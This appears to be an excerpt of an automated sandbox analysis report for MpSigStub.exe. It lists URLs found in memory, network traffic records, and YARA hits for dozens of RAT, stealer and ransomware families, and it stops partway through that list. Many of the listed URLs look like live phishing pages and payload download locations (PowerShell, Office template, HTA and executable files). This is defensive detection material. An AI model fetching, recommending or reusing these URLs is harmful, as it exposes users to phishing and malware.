    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
    Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmpString found in binary or memory: https://www.anthonyshandyman.com/irn/toolzlord.php
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpString found in binary or memory: https://www.apple.com/appleca/0
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: https://www.arm-mn.com/wp-content/themes/bb-theme/classes/msg.jpg
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: https://www.astedams.it/uploads/frame/61.dotm
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: https://www.astedams.it/uploads/template/17.dotm
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://www.augenta.com/site/xmlrpc.php
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://www.autopfand24.de/pfandhaus-in-meiner-naehe/
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: https://www.bancanetempresarial.banamex
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmpString found in binary or memory: https://www.bitly.com/
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: https://www.bitly.com/bug41
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: https://www.bizsonet.com/wp-admin/js/jquery
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://www.botanicinnovations.com/wp-admin/admin-ajax.php
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://www.brawnmediany.com
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://www.cactusthebrand.com/xmlrpc.php
    Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmpString found in binary or memory: https://www.ccleaner.com/inapp/installerofferpage
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://www.coastalbridgeadvisors.com
    Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmpString found in binary or memory: https://www.cogmobile.com/next1.php
    Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmpString found in binary or memory: https://www.coinblind.com/lib/coinblind_beta.js
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://www.creamery201.com/
    Source: MpSigStub.exe, 00000023.00000003.6290146708.0000028BD5FA2000.00000004.00000001.sdmpString found in binary or memory: https://www.dfib.net/calc.exe
    Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: https://www.divera.nl/wp-content/themes/flexfit/framework/css/font/gr
    Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmpString found in binary or memory: https://www.doganturan.av.tr/wp-admin/alu/reportdhlnew2.php
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpString found in binary or memory: https://www.doganturan.av.tr/wp-admin/bigi/reportdhlnew2.php
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmpString found in binary or memory: https://www.dropbox.com/
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: https://www.dropbox.com/s/
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: https://www.dropbox.com/s/dmprbq9mxwylpht/zs437zfig68f.doc?dl=1
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: https://www.dropbox.com/s/foughx315flj51u/worddata.dotm?dl=1
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://www.dropbox.com/s/jxfyg8a6oj13z7i/factuur%20006643-89845.zip
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://www.dropbox.com/s/r9xrl3meju6lr19/payment_advice.uue?dl=1)
    Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmpString found in binary or memory: https://www.e-gold.com
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: https://www.e-gold.com/
    Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmpString found in binary or memory: https://www.e-gold.com/acct/
    Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmpString found in binary or memory: https://www.e-gold.com/acct/accountinfo.asp
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: https://www.e-gold.com/acct/ai.asp?c=AS
    Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmpString found in binary or memory: https://www.e-gold.com/acct/verify.asp
    Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmpString found in binary or memory: https://www.e-gold.com/acct/verify.asp&BAction=
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://www.econoticias.com.bo/aa/excel.php
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://www.econoticias.com.bo/bb/excel.php
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://www.econoticias.com.bo/cc/excel.php
    Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmpString found in binary or memory: https://www.elcom.admin.ch
    Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: https://www.emergencydentistlondonpro.co.uk/hddu2vgb7muait.php
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://www.escrowprotects.com/share
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: https://www.exploit-db.com/exploits/39719/
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: https://www.fabianiarte.com/uploads/imgup/
    Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: https://www.fastsupport.com
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpString found in binary or memory: https://www.fastsupport.com/
    Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmpString found in binary or memory: https://www.finance-portal.basf.net/portal
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: https://www.flexdirect.adp.com/client/login.aspx
    Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmpString found in binary or memory: https://www.formtools.com/f/micr0soft0ffice365mail
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://www.fotoideaymedia.es/wp-content/themes/fotoideaymedia2017/css/reset.css
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpString found in binary or memory: https://www.freecontent.bid./cpcu.js
    Source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/j/collect.
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com.tr/
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
    Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/accounts/servicelogin
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: https://www.gottalife.net/wp-content/plugins/seo_index/evt8tkbsidbqf.php
    Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: https://www.gqtoronto.com/live/excelzz/index.php?email=
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: https://www.gynfit2019.com.br/fotos.jpg
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpString found in binary or memory: https://www.hashing.win/scripts/min.js
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: https://www.hashing.win/t5s0.js
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: https://www.horizon-sun.com/po/mailbox/rectify/sys-admin-9-0-4-7/repair-00-4/1159.php
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: https://www.icq.com/people/
    Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmpString found in binary or memory: https://www.ijsiodjfo.ml/index.php?user=
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://www.ijtra.com/pear/docs/structures_graph/docs/html/media/tito/po.htm
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/
    Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmpString found in binary or memory: https://www.kbtseafood.com/wp-content/uploads/2019/07/JTGUJRDPX.res
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: https://www.listrikindo.com/templates/vinye/wp-content/themes/jamo/order1.doc
    Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmpString found in binary or memory: https://www.llotytue.gq/index.php?user=
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: https://www.luongynhiem.com/wp-content/themes/sahifa/js/msg.jpg
    Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmpString found in binary or memory: https://www.maan2u.com/alls.txt
    Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmpString found in binary or memory: https://www.managuytakayama.com/purchases
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: https://www.marriott.com
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: https://www.miracleworkstudios.com/wp-content/uploads/2019/12/app/
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: https://www.monconcept-renovation.fr/wp-admin/network/msci.exe
    Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: https://www.moverandpackermvp.com/hindustan/scan/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://www.nachhilfe-unterricht.com/wp-content/cache/autoptimize/css/autoptimize_018281502668e27604
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: https://www.nathiagali.com/wp-includes/phpmailer/fmupdates/next.php
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: https://www.nathiagali.com/wp-includes/pomo/s2/danielmccarthy.php
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: https://www.ne-ba.org/files/gallery/images/bae_ecs_epm.jpg
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: https://www.nextrecruitment.ro//pdd/sfexpress/index.php?email=hiroyuki.ume.zh
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: https://www.notion.so/ce3baa2cd5ec4f4eab00575f5ae423e8
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: https://www.objectiveline.com/tt-onedrive/sugar.php
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: https://www.oratoriostsurukyo.com.br/arquivos/teste.hta
    Source: unknown DNS traffic detected: queries for: drive.google.com
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
    Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
    Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9gljef6kikngnm2hs1ehcuq6imn5jtp3/1634049300000/00014782062933200622/*/1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-00-88-docs.googleusercontent.com Connection: Keep-Alive
    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49785 version: TLS 1.2
    Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49786 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing:

    Yara detected LimeRAT
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected LaZagne password dumper
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Linux EvilGnome RC5 key
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected VBKeyloggerGeneric
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp Binary or memory string: DirectDrawCreateEx
    Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmp Binary or memory string: GetRawInputData
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

    E-Banking Fraud:

    Yara detected Predator
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected RevengeRAT
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Pony
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Njrat
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected AveMaria stealer
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

    Spam, unwanted Advertisements and Ransom Demands:

    barindex
    Yara detected BlackMoon RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Ragnarok ransomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Avaddon RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected BLACKMatter RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected JigsawShow sources
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected GABUTS RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected AESCRYPT RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected RansomwareGenericShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Ouroboros ransomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Chaos RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Mock RansomwareShow sources
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Conti ransomwareShow sources
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd718e899.156.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd718d495.114.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd718fe9d.113.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd718fe9d.155.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd718d495.127.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd718e899.115.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd718e899.128.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd718d495.154.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd718fe9d.129.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6347949598.0000028BD6FAA000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6308216657.0000028BD7178000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6324441483.0000028BD7178000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected NoCry RansomwareShow sources
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected ByteLocker RansomwareShow sources
    Source: Yara matchFile source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected RegretLocker RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Clop RansomwareShow sources
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd67c4b16.150.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected LockBit ransomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected LOCKFILE ransomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Cerber ransomwareShow sources
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd745f702.85.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Rhino ransomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Buran RansomwareShow sources
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected VHD ransomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Netwalker ransomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Jcrypt RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Delta RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected LazParking RansomwareShow sources
    Source: Yara matchFile source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Zeppelin RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Apis RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Wannacry ransomwareShow sources
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected MegaCortex RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Cobra Locker ransomwareShow sources
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected RekenSom ransomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Babuk RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Nemty RansomwareShow sources
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Clay RansomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Thanos ransomwareShow sources
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected CryLock ransomwareShow sources
